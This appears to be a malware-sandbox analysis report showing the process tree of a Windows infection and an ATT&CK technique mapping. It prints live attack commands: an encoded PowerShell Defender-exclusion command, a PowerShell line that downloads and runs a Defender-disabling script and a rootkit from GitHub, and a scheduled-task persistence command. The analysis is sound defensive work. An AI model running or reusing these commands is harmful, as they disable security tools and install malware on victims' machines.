    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAaAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAegBlACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\WebThreatDefense (32 Bits).exe
    "C:\Windows\WebThreatDefense (32 Bits).exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4728
    - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4260
      - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB5F2.tmp.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2292
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1624
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "WebThreatDefense (32 Bits)" /tr "C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2468
- - C:\Users\Admin\AppData\Local\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\BootstrapperNew.exe"
    3⤵
    - Executes dropped EXE
    PID:4524
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3652

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3992

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4536

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2296

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:816

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5024

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3732

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 97ca8b64daba3b063cd058d69cb60ef6 Xu7WT26x6k2+3Q23lkzhQw.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:4160
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3708

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4180

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Drops file in Windows directory
PID:6040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:3532

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery